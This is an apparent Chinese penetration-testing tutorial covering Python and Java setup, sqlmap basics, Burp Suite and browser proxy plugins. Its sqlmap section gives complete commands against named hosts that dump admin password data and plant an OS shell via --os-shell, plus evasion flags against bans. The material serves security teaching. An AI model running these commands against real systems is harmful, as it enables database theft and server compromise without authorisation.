渗透测试常用工具了解
4-2 渗透测试常用工具讲解
1.环境的安装(Java|python)
python(2.7.16)环境的安装:
python(2.7.16)下载地址
下载好文件后 直接安装就可以 (各种下一步下一步)
java环境的安装:
Java下载地址
点击同意并开始免费下载
拿着安装软件直接默认安装就行,全部下一步下一步,环境建议安装C盘
python默认路径:C:\Python27
Java默认路径:C:\Program Files\Java\jre1.8.0_211\bin
环境变量的添加
python和Java都是一门编程语言,编程语言一般都需要有那个语言对应的环境才能运行。如果我们需要在任意文件夹中直接调用那么我们就需要添加一个环境变量。
环境变量:环境变量一般是指在操作系统中用来指定操作系统运行环境的一些参数,如果我定义了这个环境变量的路径,那么当在windows系统的变量中寻找不到的时候,就会去我添加的路径去寻找对应的东西。
例如:我把桌面加入环境变量,我就可以在任意路径的cmd窗口打开桌面的文件
2.Sqlmap的基础指令
Sqlmap 是用的最为广泛的自动化检测、利用SQL注入的渗透测试工具,支持多种数据库。
-u 指定注入点
--dbs 跑库名
--tables 跑表名
--columns 跑字段名
--dump 枚举数据
-D 指定库 -T 指定表 -C 指定字段
判读是否有注入
sqlmap -u \'http://59.63.200.79:8003/?id=1\'
所有库名
sqlmap -u \'http://59.63.200.79:8003/?id=1\' --dbs
获取maoshe库的表
sqlmap -u \'http://59.63.200.79:8003/?id=1\' -D maoshe --tables
获取admin表的字段名
sqlmap -u \'http://59.63.200.79:8003/?id=1\' -D maoshe -T admin --columns
遍历admin的password数据
sqlmap -u \'http://59.63.200.79:8003/?id=1\' -D maoshe -T admin -C password --dump
遍历admin表的所有数据
sqlmap -u \'http://59.63.200.79:8003/?id=1\' -D maoshe -T admin --dump
常见指令:
--random-agent 选择随机user-agents头
--delay=1 每次探测延时1秒(防止访问过快被ban)
--count 查看数据量
--proxy "http://127.0.0.1:1080" 使用本地1080端口
--level 1-5 测试等级(最低1,最高5) level等级越高检测越详细,例如 level大于2会检测cookie注入,大于3会检测头注入
--is-dba 查询当前用户权限,如果DBA是True可以尝试直接拿webshell
sqlmap -u \'http://shop.aqlab.cn:8001/single.php?id=1\' --is-dba
--os-shell尝试往网站中放入一个cmdshell(就是拥有cmd权限的shell),先选择写入shell的脚本语言
sqlmap -u \'http://shop.aqlab.cn:8001/single.php?id=1\' --os-shell
有的需要填写网站的web目录的绝对路径,有的可以直接选择好shell的脚本语言类型就可以直接拿shell
3.Burpsuite工具的基础使用
Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。
我们先进行安装把工具装好,如果遇到破解问题可以看我的帖子
https://www.zkaq.org/t/2178.html
4.浏览器插件的安装
插件可以帮助我们更好的对浏览器进行操作,例如Proxy SwitchySharp插件可以帮助我快速的使用代理
安装浏览器插件的文章地址:https://www.zkaq.org/t/3683.html
- 点赞
- 收藏
- 关注作者
评论(0)